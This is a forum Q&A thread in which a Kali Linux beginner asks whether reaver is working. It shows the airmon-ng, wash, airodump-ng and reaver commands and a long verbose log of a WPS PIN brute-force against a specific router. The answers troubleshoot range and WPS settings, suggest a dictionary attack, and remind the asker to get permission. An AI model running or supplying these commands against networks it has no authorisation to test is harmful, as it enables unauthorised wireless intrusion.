# Is reaver working?

Tags: wireless-networking, kali-linux, wpa2, wps

I am new to Kali 2 and reaver and would appreciate it if someone with experience with could verify based on the code below whether it is working as it should be. When I input

```
airmon-ng start wlan0mon
```

and

```
wash -i wlan0mon
```

then

```
airodump-ng wlan0mon
```

and finally

```
reaver -i wlan0mon -b XX:XX:XX:XX:XX:XX -vv
```

Does this mean that reaver is working? I know I should keep letting it run but last time I did I believe it froze.

```
root@kali:~#      reaver -i wlan0mon -b AC:EC:80:23:B1:50 -vv

Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212

[+] Waiting for beacon from XX:EC:80:23:B1:50
[+] Switching wlan0mon to channel 1
[+] Switching wlan0mon to channel 2
[+] Switching wlan0mon to channel 3
[+] Switching wlan0mon to channel 4
[+] Switching wlan0mon to channel 5
[+] Switching wlan0mon to channel 6
[+] Switching wlan0mon to channel 7
[+] Switching wlan0mon to channel 8
[+] Switching wlan0mon to channel 1
[+] Switching wlan0mon to channel 9
[+] Switching wlan0mon to channel 10
[+] Switching wlan0mon to channel 11
[+] Switching wlan0mon to channel 12
[+] Switching wlan0mon to channel 13
[+] Switching wlan0mon to channel 14
[+] Switching wlan0mon to channel 1
[+] Switching wlan0mon to channel 2
[+] Switching wlan0mon to channel 3
[+] Switching wlan0mon to channel 4
[+] Switching wlan0mon to channel 5
[+] Switching wlan0mon to channel 6
[+] Switching wlan0mon to channel 7
[+] Switching wlan0mon to channel 8
[+] Switching wlan0mon to channel 9
[+] Switching wlan0mon to channel 1
[+] Switching wlan0mon to channel 10
[+] Switching wlan0mon to channel 11
[+] Switching wlan0mon to channel 12
[+] Switching wlan0mon to channel 13
[+] Switching wlan0mon to channel 14
[+] Switching wlan0mon to channel 1
[+] Switching wlan0mon to channel 2
[+] Switching wlan0mon to channel 3
[+] Switching wlan0mon to channel 4
[+] Switching wlan0mon to channel 5
[+] Switching wlan0mon to channel 6
[+] Switching wlan0mon to channel 7
[+] Switching wlan0mon to channel 8
[+] Switching wlan0mon to channel 9
[+] Switching wlan0mon to channel 10
[+] Switching wlan0mon to channel 1
[+] Associated with AC:EC:80:23:B1:50 (ESSID: Name-2GH)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 12345670.
[+] Switching wlan0mon to channel 11
[+] Switching wlan0mon to channel 12
[+] Switching wlan0mon to channel 13
[+] Switching wlan0mon to channel 14
[+] Switching wlan0mon to channel 1
[+] Switching wlan0mon to channel 2
[+] Switching wlan0mon to channel 3
[+] Switching wlan0mon to channel 1
[+] Switching wlan0mon to channel 4
[+] Switching wlan0mon to channel 5
[+] Switching wlan0mon to channel 6
[+] Switching wlan0mon to channel 7
[+] Switching wlan0mon to channel 8
[+] Switching wlan0mon to channel 9
[+] Switching wlan0mon to channel 10
[+] Switching wlan0mon to channel 11
[+] Switching wlan0mon to channel 12
[+] Switching wlan0mon to channel 1
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: 1d:90:73:4d:03:b1:d2:27:ea:7d:ca:5d:7d:5e:6c:cd
[P] PKE:  81:20:d0:0b:d2:be:c7:cf:41:f8:3e:08:3a:17:2f:ee:44:65:9a:85:d9:5d:93:58:29:02:c2:fc:0d:cc:8f:e7:90:1b:0d:f9:02:76:50:89:83:d0:72:e8:87:f1:4d:12:38:81:15:87:e1:1f:e5:86:87:14:0d:6d:b9:91:84:96:93:66:2d:8f:96:f9:13:73:57:51:6b:c4:11:31:f2:e6:8b:1d:46:fe:28:46:1f:8a:fc:92:ea:b1:c8:8f:a3:d2:d9:71:d2:9a:3d:65:b3:d7:07:e8:20:f9:74:89:a8:d5:ff:e8:51:d5:d5:3d:3c:9f:2a:c6:db:4b:e9:78:a6:59:f5:3e:dc:17:9f:60:ae:f0:45:fb:94:de:a8:40:2c:34:db:38:62:1e:ba:76:4a:62:72:dd:1c:6f:37:c4:be:30:ad:a3:dc:d3:18:a9:c3:f1:74:aa:2b:b7:44:ad:b3:6d:a0:17:2f:bf:50:60:f4:f3:b9:22:f4:c2:fb:21:22:68
[P] WPS Manufacturer: Celeno Communication, Inc.
[P] WPS Model Name: Celeno Wireless AP 2.4G
[P] WPS Model Number: CL1800
[P] Access Point Serial Number: 12345678
[+] Received M1 message
[P] R-Nonce: cb:17:7f:a8:22:c2:15:29:77:0c:b1:97:7a:e9:fa:6e
[P] PKR: a3:a1:49:6f:39:b9:bc:5b:42:e4:e5:4b:d1:51:6a:93:91:dd:4a:32:91:22:42:a4:4f:60:b8:34:5a:42:20:82:a6:16:fc:c3:f9:1a:c6:44:9f:87:05:cf:f8:b4:cc:a1:4c:cb:3d:ba:ed:cb:31:a0:c4:89:63:18:f3:40:49:6d:91:3b:7b:50:66:d5:4c:96:95:87:0d:41:56:c3:ed:4e:fa:37:4c:30:d8:75:45:14:80:a7:4d:ca:82:84:0e:7d:7c:5a:47:39:11:05:da:42:15:54:b0:f5:63:f9:62:4e:55:9d:56:ca:8a:eb:40:25:4f:63:33:3c:ba:64:0b:d6:d6:3c:46:fb:c5:f2:08:60:67:e0:27:aa:62:b8:38:bf:20:a0:77:88:47:7f:09:40:08:3d:77:f5:2a:7b:e6:af:e7:b6:8a:1c:ee:46:52:1f:71:86:b1:1a:5d:c1:23:94:ec:76:91:cc:4a:15:64:2f:1e:66:13:98:53:d8:83:97
[P] AuthKey:   6c:08:fb:2a:de:90:1f:2f:6c:10:71:e5:9c:b1:39:2a:e4:f5:c3:5d:5b:b5:ea:07:8c:6a:3a:d2:45:bd:a4:d3
[+] Sending M2 message
[+] Received M1 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
```

I guess I am just looking for confirmation from someone with experience. Is reaver working here? I need to know before I let this run for the next day or so.

Answer (score 0):

When you run `wash -i wlan0mon` there will be a list of routers which are vulnerable to reaver.

Does the router you re trying against show up in wash?
If so what is the strength?
I found personally that this happens when I am out of range to my router.

If this is your router you are trying this against try putting it next to your antenna, if not then get permission, or buy a router that is susceptible to this attack.

Answer (score -1):

No, this is just switching channels in order to match the WAP channel. Once it does that it will continuously try to authenticate via WPS until it gets it. This means if they do not have WPS turned on then this will not work. You may be better off going with a dictionary hack.

Remember to only do this on your own test network for penetration testing purposes. It may well be illegal to interfere with other peoples Wi-Fi in your jurisdiction.